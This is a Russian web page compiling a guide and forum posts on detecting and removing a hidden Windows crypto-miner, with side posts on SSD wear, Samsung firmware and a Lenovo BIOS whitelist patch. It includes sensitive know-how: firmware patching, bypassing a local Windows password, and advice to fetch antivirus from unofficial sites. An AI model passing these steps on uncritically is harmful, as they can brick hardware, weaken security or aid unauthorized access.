Главная страница » Как удалить майнер который закрывается после открытия диспетчера задач

Как удалить майнер который закрывается после открытия диспетчера задач

  • автор:

Как обнаружить и удалить скрытый майнер в Windows

Как обнаружить и удалить скрытый майнер в Windows

Под скрытым майнером подразумевается программа-вирус, которая использует ресурсы вашего компьютера для добычи криптовалют. Делается это в автоматическом режиме без ведома пользователя и каких-либо предупреждений.

Чаще всего поймать скрытый майнер можно при скачивании файлов из непроверенных источников. Обычно это какой-то пиратский контент, который пользуется большой популярностью среди пользователей. Также наткнуться на подобный вирус можно при получении различных спам-рассылок. В любом варианте вы получаете желаемое, а вместе с этим на ваш компьютер может быть загружен скрытый майнер или утилита для его автоматического скачивания из Сети.

Чем опасен скрытый майнер

Майнер заставляет ваш ПК работать на максимальном уровне производительности, а значит, даже при выполнении несложных офисных задач компьютер может изрядно тормозить. Длительная работа на пределе своих возможностей рано или поздно скажется на «железе».

В первую очередь может пострадать видеокарта, процессор, оперативная память и даже система охлаждения, которая просто не сумеет справиться с ежедневными стресс-тестами.

Первый признак присутствия майнера — торможение на простых задачах и незамолкающий кулер.

Также майнеры вполне могут получить доступ к вашим персональным данным, хранящимся на компьютере. Здесь в ход может пойти всё: начиная от простых фотографий и заканчивая данными различных аккаунтов и электронных кошельков. А это уже очень опасно.

Как майнеру удаётся прятаться

Обычно за работу майнера на вашем ПК отвечает отдельный сервис, который позволяет прятать и маскировать угрозу. Именно такой спутник контролирует автозапуск и поведение вируса, делая его незаметным для вас.

К примеру, данный сервис может приостанавливать работу майнера при запуске каких-то тяжёлых шутеров. Это позволяет освободить ресурсы компьютера и отдать их игре, чтобы пользователь не почувствовал тормозов и проседания частоты кадров. По закрытию шутера вирус вновь возьмётся за работу.

Этот же сервис сопровождения способен отследить запуск программ мониторинга активности системы, чтобы быстро отключить майнер, выгрузив его из списка запущенных процессов. Однако особенно опасные вирусы и вовсе могут попытаться отключить средства сканирования на вашем компьютере, исключив обнаружение.

Как обнаружить скрытый майнер

Если вы стали замечать, что компьютер стал изрядно тормозить и греться, в первую очередь стоит запустить проверку антивирусом со свежими базами. В случае с простыми майнерами проблем быть не должно. Угроза будет обнаружена и устранена. С хорошо скрывающими своё присутствие вирусами придётся повозиться.

Отследить скрытые майнеры позволит систематический мониторинг «Диспетчера задач», который на Windows можно открыть при помощи комбинации клавиш Ctrl + Alt + Del или Ctrl + Shift + Esc. В течение 10–15 минут вам нужно просто понаблюдать за активными процессами при полном бездействии. Закройте все программы и даже не шевелите мышкой.

Если при таком сценарии какой-то из активных или же внезапно появившихся процессов продолжает нагружать «железо» — это верный повод задуматься. Происхождение такого процесса можно проверить с помощью вкладки «Подробности» или через поиск в интернете.

Многие скрытые майнеры, использующие в основном видеокарту ПК, могут не нагружать центральный процессор, а значит, и в «Диспетчере задач» на старых версиях Windows они не засветятся. Именно поэтому лучше оценивать нагрузку на «железо» с помощью специализированных утилит, таких как AnVir Task Manager или Process Explorer. Они покажут куда больше стандартного инструмента Windows.

Некоторые майнеры способны самостоятельно отключать «Диспетчер задач» через несколько минут после его запуска — это тоже признак потенциальной угрозы.

Отдельно стоит выделить ситуацию, когда «Диспетчер задач» демонстрирует чрезмерную нагрузку на процессор со стороны браузера. Это вполне может быть результатом воздействия веб-майнера, функционирующего через определённый веб-сайт.

Как удалить скрытый майнер с компьютера

Первым и самым логичным оружием в борьбе против такой напасти является антивирус, о чём уже было сказано выше. Однако нередко майнеры не распознаются как зловредные угрозы. Максимум они приравниваются к потенциально опасным, особенно если на компьютер попали вместе с пиратской игрой или взломанной программой.

В случае отсутствия у вас мощного антивируса можно прибегнуть к помощи небольших лечащих утилит. В пример можно привести Dr.Web CureIt!, которую нередко используют для поиска скрытых майнеров. Распространяется она бесплатно.

Вручную, без каких-либо сторонних инструментов удаление вируса также возможно, но вы должны быть на 100% уверены, что обнаружили именно майнер. В таком случае вам нужно перейти в реестр, набрав regedit в поиске Windows, и в нём сочетанием клавиш Ctrl + F запустить внутренний поиск (или же через «Правка» → «Найти»).

В открывшейся строке введите название процесса из диспетчера, за которым, по вашему мнению, скрывается майнер. Все обнаруженные совпадения нужно удалить через контекстное меню. После этого можно перезагрузить компьютер и оценить изменения нагрузки на «железо».

Заключение

Важно понимать, что скрытый майнер опасен не только чрезмерной нагрузкой на ПК, но и возможностью перехвата ваших личных данных. При первом же намёке на такую угрозу запустите глубокую проверку памяти компьютера актуальным антивирусом.

Не забывайте, что тормозить ваш компьютер может по самым различным причинам. Более важным признаком угрозы скрытого майнига является чрезмерная активность ПК во время простоя или при выполнении элементарных задач. Обращайте внимание на работу кулеров видеокарты: они не должны шуметь при отсутствии нагрузки.

Если же вы всё-таки обнаружили неизвестный процесс, нагружающий компьютер под завязку, с ним определённо нужно разобраться. С помощью антивирусного ПО или же вручную, отыскав и удалив его через реестр.

Решена Словил Майнер который закрывает диспетчер задач, не даёт скачивать утилиты. (Realtek HD Audio).

 2

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV-br.exe (или любое другое имя).
Как вариант, можно воспользоваться версией со случайным именем. Если и так не запускается, запустите его в безопасном режиме с поддержкой сети.

В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером в обычном режиме загрузки.

Pelmennn2
Новый пользователь
  • 5 Янв 2023
  • #8
Вложения
Pelmennn2
Новый пользователь
  • 5 Янв 2023
  • #9
Pelmennn2
Новый пользователь
  • 5 Янв 2023
  • #10
Вложения
Pelmennn2
Новый пользователь
  • 5 Янв 2023
  • #11
Вложения
Pelmennn2
Новый пользователь
  • 5 Янв 2023
  • #12
Sandor
  • 6 Янв 2023
  • #13

Надо. Если нет быстрого ответа, учитывайте праздничные дни

Дополнительно:
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Как удалить скрытый майнер ⁠ ⁠

Шутки шутками, но недавно столкнулся с такой ситуацией, когда после перезагрузки мой далеко не слабый комп вдруг в простое начал шуметь, температура процессора сразу поднялась до 70 градусов, как при игре. Открываю диспетчер задач, нагрузка резко падает, и всё становится как обычно. После закрытия диспетчера задач вдруг опять вентиляторы начинают шуметь, процесс начинает греться, открываю диспетчер задач, история повторяется. Если открыть Диспетчер задач и быстро отсортировать по нагрузке на процессор, то становится видно, что систему грузит программа MicrosoftHost.exe, которая находится в папке C:\ProgramData\WindowsTask\. Сразу первым делом пытаюсь зайти на сайт Dr.Web, чтобы скачать CureIt, но при переходе на сайт, меня вдруг перекидывает на страницу 8.8.8.8 вроде, или что-то такое было. Ну после этого я сразу понял, что подцепил какой-то вирус, если погуглить по названию процесса, то пишут, что это скрытый майнер, что объясняет почему там грузит систему одна программа. Притом, если скачать CureIt с телефона и запустить на компе, то CureIt находит вирус и удаляет, как будто бы. Но после перезагрузки всё остаётся также.

Решил написать, как почистить данный вирус, если знать что делать, то времени занимает немного, но поначалу я часа полтора сидел, пока всё почистил. Но некоторые моменты сделаны довольно хитро, если не очень хорошо ориентируешься в компах, то фиг почистишь этот вирус.

В общем для того, чтобы эту бяку полностью вычистить надо проделать следующие шаги.

Сразу говорю, я точно уже не помню, как назывались процессы и т.д., и это действия только для того типа скрытого майнера, который я поймал, у других могут отличаться. Но думаю сама последовательность действий может помочь.

1. Первым делом включаем отображение системных файлов, потому что папки с вирусом созданы как системные. И включаем отображение скрытых файлов. После всех действий можно обратно выключить. Нужно сделать как на скрине.

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

2. После этого открываем файл hosts, который находится в папке C:\Windows\System32\drivers\etc\. Там будет видно много строк наподобие такой

Не помню точно, на какой адрес было перенаправление, но в файле будет куча подобных строк, с адресами всех популярных антивирусов. Удаляем все эти строки, и сохраняем файл hosts. Редактировать надо в режиме администратора, иначе прав не хватит.

3. Теперь надо найти все процессы вируса. Было несколько папок с вирусом, которые лежали в папке C:\ProgramData\. Чтобы наверняка их найти, открываем Диспетчер задач, и включаем отображение столбца Командная строка, и ищем процессы, которые находятся в папке C:\ProgramData\. Например, помню был один вирус, который назывался Realtek HD, он был со значком динамика, т.е. маскировался под звуковые драйвера, но запущен он был не из папки C:\Windows\System32\, а из папки C:\ProgramData\.

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

Если нашли такой процесс, нажимаем правой кнопкой на процесс, далее Свойства, и открываем вкладку Цифровые подписи, у нормальных драйверов и процесс будут подписи, у вируса их не будет.

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

Находим все такие процесс, которые лежат в папках внутри C:\ProgramData\ и останавливаем их, иначе не получится удалить папку, пока программа внутри неё запущена.

4. Далее заходим в папку C:\ProgramData\. Там видим кучу системных папок, среди которых будут папки с именами известных антивирусов (думаю из-за этого CureIt и не мог ничего сделать, потому что не было прав на папку), и папки, в которых лежат процессы, которые мы остановили. Сделать с этими папками мы ничего не можем, т.к. при попытке открыть или что-то сделать, нам пишет, что нет прав, даже если у нас права администратора.

С каждой папкой нам необходимо сделать следующие действия:

Нажимаем правой кнопкой -> Свойства -> Безопасность -> Дополнительно.

В открывшемся окне мы видим, что у этой папки нет владельца. Нажимаем Изменить и указываем свою учетную запись владельцем.

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

И обязательно ставим галочку для дочерних объектов. После этого везде нажимаем ОК, чтобы сохранить. Теперь спокойно удаляем эту папку. Это нужно сделать со всеми папками с именами антивирусов и с процессами, которые мы ранее удалили. После этого надо в зайти в папки

C:\Program Files (x86)\

И точно также изменить владельца и удалить папки с именами антивирусов и различных программ от вирусов. Мне к 20 папке надоело проделывать все эти действия, поэтому можно сделать проще, через командную строку. Можно сразу в блокноте подготовить список всех папок и выполнить

takeown /F C:\ProgramData\Avira\ /R /D Y

takeown /F C:\ProgramData\DrWeb\ /R /D Y

Как удалить скрытый майнер Майнеры, Компьютерный вирус, Антивирус, Компьютерная помощь, Windows, Длиннопост

5. Готово. После этого можно скачать тот же CureIt и всё проверить, также можно обратно скрыть системные файлы. И ещё этот майнер добавил свои папки в исключения Защитника Windows, на всякий случай надо тоже оттуда удалить эти папки.

1. Файл хост скрыт и его не открыть. Ищем его содержание в инете, вставляем в блокнот, сохраняем с названием host, и вставляем в папку etc с заменой.

2. Майнер блокирует запуск всех ехе, и не дает запуск антивируса? Скачиваем RogueKiller. Прога написанная на основе браузера инернетэкплорер. Запускается при ЛЮБЫХ запретах, и чистит их. После чего запускаем уже антивирус.

Такие пакости всегда лучше убирать, запускаясь с флешки, никаких танцев с бубнами и прятками не будет. У большинства топовых антивирусников есть загрузочный образ для флешки со всем необходимым.

Иллюстрация к комментарию

Оо, у меня был точно такой же вирус! Изобретательный до жути.

Спасибо за шпаргалку, надеюсь, никому больше не пригодится 😅

Большой трафик, объём записи на ssd, загрузка процессора, службы windows — решение⁠ ⁠

Здорово браты.
Сейчас искал по своей проблеме решение. Нашёл, делюсь.

Значит начались эти события.

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

с того, что мне как то подозрителен. да и надоел порядком, мигающий вечно диод работы \ обращения к винту.
Какое то время не придавал этому значение, т.к. башня стояла под столом, направлена диодом туда, где этот свет никому не мешает.
Недавно переставил её на стол и светомузыка стала ощутимой.
Полез смотреть в кристалдиск инфо, а там по винту, который под системой вот такая картина

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

для сравнения привожу диск с компа, который работает почти 24 на 7, хоть и в слабых задачах и почти без интернет трафика, но простите. разницу видите. Я ожидал большего.

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

температура накопителя, надо сказать ,после нескольких минут после включения, достигала 50 градусов, при разрешённых 70, что так же, мне показалось ненормальным.
Путём нехитрых подсчётов выяснил, что трафик около 120 гигов в сутки. К слову сказать, данная модель имеет наработку на отказ 150 терабайт, и 1\5 часть (20%) уже израсходована. И это , всего лишь за пару лет эксплуатации.
Сильно активно компом не пользовался. Скачивание идёт на НЖМД) все хранилища на нжмд и тд. ССД только система. А игр кот наплакал. В основном 3 герои, цивилизация, ютубчик, да и те, довольно редко.
Не слишком ли круто?

Ок. Что может грузить винт? Пойду посмотрю в диспетчер задач.
А там

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

теперь решаю её:
Вкладка службы — выбираю Службу политики диагностики, правой кнопкой мыши и открыть службы

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

В приведённом ниже появившемся окне, отыскиваю паразита и обращаю внимание на то, что врубается автоматически

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

Предварительно снимаю задачу в «процессах» диспетчера задач, в текущем окне правой кнопкой мыши по нужной строчке,

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

Ну а в появившемся окошке нужно будет или отключить или сделать вручную.

Большой трафик, объём записи на ssd, загрузка процессора, службы windows - решение SSD, Диски, Трафик, Windows, Компьютерная помощь, Длиннопост

ну вот так.
Теперь диод винтов почти не мигает, сравнительно с тем, как это было до процедуры.
температура упала на 8 градусов.(сейчас 42 вместо 50, когда служба работала)
Думаю и трафик по записи теперь уменьшится.

Надеюсь, что помог(у) читателям, тем кто будет искать в будущем, избавиться от проблемы гашения ссд дисков и сохранения карманов, а также облегчить жизнь процессору.

Отключение Whitelist в Lenovo G780 (в частности 20138) [возможно сработает и на других ноутбуках Lenovo]⁠ ⁠

Unauthorized wireless network card is plugged in power off and remove it.

Понадобилось заменить глючный и медленный Wi-Fi модуль на другой, более быстрый и стабильный. Кукарекал на эту тему несколько дней и в итоге разобрался.

Если есть такие же самураи как я, которые идут по этому пути, то дальше делаем на свой страх и риск.

Все, что здесь есть — собрал из говна и палок (из разных источников). Все делалось в системе Windows 11. Набор для действий (архив) прикрепил ниже.

Для дальнейших действий нужна флешка и напряженная задница.

Запускаем от имени «батьки» программу: BACKUP_Tools12_2.exe

На рабочем столе появляется results.rar

Вытягиваем оттуда что-то похожее на прошивку, у меня оно называлось: x32_bios-region_8.1.51.1476.bin

Заходим в папку Ezh20 в программу EzH2O.exe

В программе выбираем File — Load File.

Тип файлов меняем на ALL.

Выбираем файл, который был в results.rar — у меня нзывался x32_bios-region_8.1.51.1476.bin

Далее выйдет какая-то чепуха, машем головой и движемся в Components — Module. — Delete Existing Module

В окне, где GUID выбираем 11D378C2-B472-412F-AD87-1BE4CD8B33A6 и нажимаем Patch.

После улу-мулу процесса сохраняем это через Save as. что-то а-ля 3651F04.fd

Далее этот файл переименовываем в bios.bin (расширение с fd на bin).

Этот переименованный файл закидываем в папку Modified.

Затем заходим в rufus-2.1.exe

Записываем флешку как FreeDOS

Копируем содержимое из папки Modified в загрузочную флешку.

Перезагружаемся на флешку в режиме Legacy.

Выбираем русскую кодировку (если вдруг выйдет такое меню).

Как загорится С:> набираем «flash.bat» (без кавычек) жмем энтер.

Потом выходит всякая хрень и просит нажать энтер.

Потом просит нажать любую кнопку.

Далее перезагружаемся в БИОС, возвращаем нужные настройки и молимся, что все ок, но на самом деле помолиться нужно до того, как начали все это делать.

Теперь ссылки на источники, а также информация взята здесь, на авторство не претендую:

Возможно вышеописанное сработает и на других ноутах Lenovo. Конкретно у меня получилось на ноуте, описанном в заголовке.

Набор можно скачать здесь (раскидал на разные хостинги для выживаемости файлов):

Надеюсь кому-то поможет.

У кого получилось не сломать устройство, просьба отписаться в комментариях о своем аппарате для статистики и других ищущих решения данного вопроса.

Отключение Whitelist в Lenovo G780 (в частности 20138) [возможно сработает и на других ноутбуках Lenovo] Windows, Компьютерная помощь, Компьютер, Ноутбук, Ремонт ноутбуков, Материнская плата, Ремонт техники, Электроника, Нужна помощь в ремонте, Электрика, Текст

Отключение Whitelist в Lenovo G780 (в частности 20138) [возможно сработает и на других ноутбуках Lenovo] Windows, Компьютерная помощь, Компьютер, Ноутбук, Ремонт ноутбуков, Материнская плата, Ремонт техники, Электроника, Нужна помощь в ремонте, Электрика, Текст

Samsung выпустила фикс для «умирающих» накопителей 980 Pro — пациент будет жить⁠ ⁠

Samsung выпустила фикс для «умирающих» накопителей 980 Pro — пациент будет жить Компьютер, Windows, Компьютерная помощь, Samsung, SSD

В последнее время в сети появляется все больше жалоб на работу твердотельных накопителей Samsung. Недавно стало известно, что топовые 990 Pro деградируют в геометрической прогрессии. Правда, компания пока не признает проблему и не спешит решать ее в рамках гарантии. Похожие проблемы возникают и у прошлого поколения — только в этом случае Samsung сжалилась над клиентами и выпустила фикс.

Компания Puget Systems, специализирующаяся на сборке готовых ПК, и ее клиенты заметили, что твердотельные накопители Samsung 980 Pro работают со сбоями и являются причинами нестабильного поведения систем. Специалисты изучили проблему и отправили запрос в гарантийный отдел Samsung.

Выяснилось, что некоторые модели накопителей 980 Pro могут выйти из строя даже в начале своего жизненного цикла. По словам специалистов Puget, сбои чаще всего возникают на прошивке 3B2QGXA7, а также в версиях 980 Pro на 2 ТБ. Причина не уточняется, хотя пользователи Reddit предположили, что сбойные накопители слишком часто сообщают об ошибке 0E в S.M.A.R.T, из-за чего переполняется буфер, и устройство автоматически признается нерабочим.

Один из юзеров Reddit сообщил, что его модель на 2 ТБ вышла из строя с количеством ошибок около 32 000. При этом на новом накопителей накопилось уже более 2000 ошибок, так что он тоже скоро заблокируется и будет доступен только в режиме для чтения.

Впрочем, проблема оказалась софтовой — Samsung выпустила прошивку под номером 5B2QGXA7, которая устраняет шквал ошибок и переполнение счетчика сбоев. Стоит отметить, что прошивка рекомендована только для обновления SSD с номером ПО 3B2QGXA7. Устройства с прошивками 4B2QGXA7 и 5B2QGXA7 работают без нареканий. Обновить устройство можно с помощью фирменной утилиты Samsung Magician.

Эволюция как она есть⁠ ⁠

Порой так интересно наблюдать за эволюцией компьютерных вирусов. Вот так подхватишь какую-то дрянь, начинаешь разбираться и так увлекаешься этим делом, прямо чувствуешь себя Дроздовым. И ведь каждый раз найдешь что-то новенькое, уловки любой ценой защититься от всяких там юзверей.

Немного пояснения: в виду своей деятельности и лени пришлось раскурочать свою винду в решето. Понятно, что никаких антивирусов она и не видела никогда, да и тот же win defender отправлен в вечный сон реестром и гпо, открытая удаленка и вседоверяющий файервол. Никакой адекватной защиты в трёх словах.

Но и соответственно отлов вирусов, в частности майнеров, для меня не в новинку.

История: как-то заметил, что система стала виснуть на ровном месте. Лезем в диспетчер задач загрузка 100% и через секунду 10%. Классика.
Ну, думаю, приключение на 20 минут.
Лезу качать DrWeb cureit. Открываю сайт, браузер крашится. Ага. Знаем, проходили.
Лезем качать ProcessLasso. Любимый softportal, и тут нате переадресация на домен гугла.
Это дело тоже не в новинку: лезем искать файл hosts, и вот тут пошли интересности. А файла-то нету. Тут я списал на свою глупость, что вдруг где-то не там искал, все-равно к тому моменту cureit уже была скачана на ноут и перекинута на шару.
Ставим сканить систему, а параллельно находим ProcessLasso на другом сайте и начинаем выискивать процессы, которые как-то неадекватно кушают ресурсы. Таких оказалось несколько taskhost, который в диспетчере именовался COM Surrogate, audiodg и ещё парочка, которые позже cureit пачкой и почистил.
Что в этом оказалось интересного. При попытке открыть расположение файла происходил краш проводника и диспетчера задач, но во время фриза системы удалось углядеть путь до файла: C:/program data/realtek hd
Лезем туда напрямую, и. папки нет(видимость всех скрытых файлов папок включена). Не отчаиваемся, открываем консоль и пробуем искать оттуда. Все прекрасно видит, и даже позволяет залезть и полистать файлики.

По итогу cureit все почистил. И тут я вспомнил про hosts, полез туда же консолькой и о чудо, файлик-то на месте, открываем, удаляем тонну строк переадресации на 8.8.8.8, сохраняем, заменяем, радуемся жизни.

Позже узнал, что данный вирь сидит в новых репаках от "xatab'a". Что за люди. Ничего святого в них нет.

На этом я думал, что все и порешилось, пока на моих же глазах в систему удаленно не вошёл некий John — скрытая, как позже выяснилось, учетка с правами администратора. Но об этом уже в следующий раз, если кому-то будет это интересно.

Ответ на пост «Как удалить скрытый майнер»⁠ ⁠

1. Файл хост скрыт и его не открыть. Ищем его содержание в инете, вставляем в блокнот, сохраняем с названием host, и вставляем в папку etc с заменой.

2. Майнер блокирует запуск всех ехе, и не дает запуск антивируса? Скачиваем RogueKiller. Прога написанная на основе браузера инернетэкплорер. Запускается при ЛЮБЫХ запретах, и чистит их. После чего запускаем уже антивирус.

Никогда не было и вдруг опять!⁠ ⁠

— Вы компьютеры ремонтируете?

— У нас такая проблема: скачали обновление для программы «Очень нужная программа для бухгалтерии», а при установке антивирус ругался, мы два раза пробовали, потом антивирус отключили, программа обновилась, комп перезагрузился и теперь не включается. Вы поможете?

Как избавиться от вируса-майнера?⁠ ⁠

Проблема заключается в том, что где-то раз в плюс-минус 5 минут комп чуток подвисает — идёт 100% загрузка проца и, скорее всего, видюхи, судя по работе её кулера. Ну, и естественно, что эти тормоза не приносят ничего приятного в пользование компом.

Непосредственно перед этим скачком автоматически закрывается диспетчер задач, если он был до этого открыт.

Я пробовал гуглить проблему и вышел на киберфорум, где нашёлся топик со схожими симптомами. Там говорят, что это майнер и советуют скачать AVZ и в нём выполнить некий скрипт. Далее проблема стала за тем, что я просто не смог запустить AVZ, так как после открытия программы она тут же автоматически закрывается. В итоге я запустил её и выполнил скрипт из безопасного режима, однако это вообще ничего не дало.

Тогда я попробовал зарегиться на форуме и создать тему уже непосредственно по своему случаю, но сразу после авторизации браузеры стали автоматически закрываться 🙁

Также пробовал использовать ESET и Avast, но с ними та же беда, что с AVZ: я просто не могу их установить — они закрываются.

Винду переустанавливал месяц назад — это тоже не помогло. Встроенные в винду брандмауэр и защитник у меня если что включены, настройки параметров выдачи уведомлений о вносимых в ОС изменениях тоже включены и ничего не показывают. Кстати, что характерно, загрузка проца и подвисания не такие жёсткие, когда отсутствует доступ к инету.

В общем, я не знаю, что делать и надеюсь, что мне тут подскажут решение этой проблемы.

Кажись, нашёл гадёныша:

В папке C — ProgramData — RealtekHD находится файл taskhostw, который запускает периодически процесс taskhost с описанием COM surrogate!

При попытке зайти в папку место хранения файла папка тут же закрывается.

Гугл выдаёт, что это таки майнер (ситуация вообще 1 в 1 как у меня)

Как я чинил компьютер⁠ ⁠

Небольшой офис, чуток компов. Один из них начинает неадекватно себя вести. Нет прав на эксплорер, нет прав на диспетчер задач, глюки в ворде, тормозит, работать невозможно. Хозяйка компа говорит, что началось всё после тыкания в него флешкой. Ну, ок, вирус, думаю. Просканировал поверхность диска на всякий, качнул в сторонке лив сиди от каспера и запустил скан.

Тут приходит вторая мадам и говорит, что ей край нужно чота отправить в госорганы при помощи ЭЦП, которая на той самой флешке. Предупреждаю, что на ней, скорее всего, вирус, и тыкать ею в комп (ноут) нельзя. Но она говорит ,что сёдня — это крайний день для этого. Ну, ок, я предупредил..

Пока я гляжу на результаты сканирования, приходит эта вторая мадам и говорит могильным голосом, что у неё всё то же самое. Я про себя удовлетворённо подумал, что это хорошо, это, значит, точно вирус, а ей сказал встать в очередь. Между тем я понимаю, что сканирование затягивается и предлагаю разойтись. Все кто куда, а я домой с её ноутом подмышкой.

Дома я начинаю вникать в происходящее. Первым делом пытаюсь запустить сканирование ноута. Не выходит ничо. Каспер лив сиди пишет, что диск смонтирован только для чтения, и лечение будет невозможно, а дрвеб лив сиди при загрузке просит ввести логин и пасс при старте дебиана (на нём его лив сиди основан). Что за логин — неизвестно. Неудача.

Начинаю уже понемногу психовать. Думаю, выну диск, подрублю к своему компу и просканирую. Открываю крышку ноута — диска нет. Понимаю, что диск ССД М2. Нужно разбирать дальше. Разобрал дальше, воткнул таки себе, прогнал вебом, каспером. Нету вирусов.

Продолжаю психовать и начинаю нервничать.

Собрал всё взад, включаю. Всё по-прежнему. Обратил внимание, что в винде нет пункта «выключение», есть только «выход». Нажал. Логично появилось окно для авторизации и с полем для ввода пароля. Понимаю, что пароля не знаю. Выяснил, что его не было вовсе. Понимаю, что не понимаю, что делать.

Сварганил флешку с утилиткой Dism, прибиваю пасс, перезагружаюсь..

Нашёл в инете, как убрать пасс при помощи реестра и дистриба виндовс. Проделываю это вот всё, но на этапе net user мне cmd сообщает, что запрос отклонён, нет прав доступа.

Ладно. Стартую снова c dism, активирую задизабленную учётку Администратор. Перезагружаюсь. Выбираю Админа. Хоба! Просит ввести пароль.

Какой в ж0пу пароль? Ладно. Убираю пароль у админа. Перезагружаюсь. Снова не помогло. Пароль при загрузке чудом возвращается.

Понимаю, что это уже вызов, ибо подобного не встречал. Всякое было, от cabanas и до шифровальщиков, но тогда хотя бы знал, кто передо мной. Тут же гранды антивирусописательства говорят, что вируса-то нет. Но, тем не менее, кто-то при загрузке что-то делает..

Тут звонит владелица ноута и просит его вернуть. Хочет отдать его другому челу, а меня умоляет заняться тем, первым компом, ибо в пнд он позарез будет нужен. Он основной, там 1С и прочая требуха. Ну, ок. Отвёз ноут, стал долбиться с компом. Напомню, поведение у них идентичное.

Ради статистики решил загрузиться в безопасном режиме. Внезапно, но комп загрузился. Хм. Стал тупо перебирать всё, что запускается при старте. Стал отключать всякие обновления адобе, драйверы принтеров, службы, названия которых я не знаю ) Внезапно натыкаюсь, что служба сбора статистики (дословно не помню) Аваст отключаться не хочет. Пишет, что отказано в доступе. Немного поколебавшись, сношу Аваст. Перезагружаюсь. Вытаращив глаза, понимаю, что всё работает. Звоню товарищу, которому отдали ноут, прошу снести Аваст. И у него тоже всё заработало.

Вишенка на торте: Аваст у них был Про. Платный.

Итого угробил я на это всё полторы суток практически.

Как подозреваю, флешка была ни при чём, просто авасты обновились одновременно. А флешка — совпадение.

Потом я её пихал куда ни попадя и проверял всем подряд — никаких последствий.

Что это было со стороны Аваста — так и не понял. Но был немножечко в ..недоумении.

Такая вот история выходного дня.

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть»⁠ ⁠

Для отслеживания подозрительных процессов очень удобен продвинутый менеджер процессов от самой майкрософт, называется ProcessExplorer.

Качается отсюда: https://docs.microsoft.com/en-us/sysinternals/downloads/proc. (сам сайт майкрософта, так что источник безопасен).

После запуска в меню выбираем эти два пункта:

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

И соглашаемся на условия конфиденциальности вирустотала.

Бинго, теперь у вас появится новая колонка в списке процессов, где отображается результат проверки на вирустотале, плюс проверка цифровой подписи запущенного файла. По нажатию на цифры сработки откроется страница вирустотала с отчётом.

ВАЖНО: сами файлы не передаются в вирустотал, он просто ищет там готовые результаты на файл с таким же хешем, так что особо мощный интернет не нужен! Если такого файла найденно не будет, то так и будет написано в данной колонке, и только по нажатию файл будет залит для проверки!

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

Так же, из полезных бонусов данной программы:

1) процессы отображаются в виде дерева, то есть вы видите, какими процессами они запущенны (на скрине показал кнопку активации данного режима)

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

2) можно вывести графики загрузки (память, проц, диск, видяха итд) для каждого процесса в таблице (правой кнопкой на название колонок, там выбрать пункты с «history» — это и есть графики)

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

3) Можно заменить этой программой встроенный менеджер процессов (для этого надо не просто открыть файл из архива, а сохранить его где-нибудь на компе)

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

4) продвинутые графики загрузки системы, открываются по нажатию на главный график сверху окна программы

Ответ на пост «Как удалить прячущийся майнер и понять что он вообще есть» Компьютер, Вирус, Майнеры, Windows, Компьютерная помощь, Ответ на пост, Длиннопост

Надеюсь, кому-то эта информация будет полезна. Сам использую данный инструмент уже лет 8, родной виндовый менеджер уже кажется убогим.

Ответ на пост «Вирус майнер nt kernel system и как с ним бороться. ( Когда открываю диспетчер задач фпс повышается )»⁠ ⁠

Эхх. где ты раньше был.
Тоже напоролся на этот вирус, пришлось долго мучаться, но всё же смог его удалить.
Если кому поможет, то боролся я с ним так: Пока искал инфу про этот вирус, напоролся на этот сайт: https://it-tehnik.ru/virus/virus-close-browser.html С него я скачал старую версию Касперского. Т.к. сайт не официальный, то вирус его не закрывал. Позже в самом Касперском я обновил его до актуальной версии и просто провёл сканирование и последующую очистку компа.

А теперь немного про сам вирус — это майнер, который весьма хорошо прячется. Как и многие другие вирусы, как только включаешь диспетчер задач, он перестаёт нагружать комп. Но он сам выключает диспетчер задач раз в минуту-две (точное время не засекал). Мой Windows Defender (винда не лицензионная) его практически не засекал. Всё что он находил — один файл, который после удаления он находил снова. и снова. и снова. Можно скачать другой антивирус, но при входе на официальный сайт он просто закрывал браузер. Казалось бы, можно скачать с другого сайта, либо с внешнего носителя, но и тут может выйти облом — этот вирус может не дать открыть некоторые антивирусы, либо не дать им провести проверку.

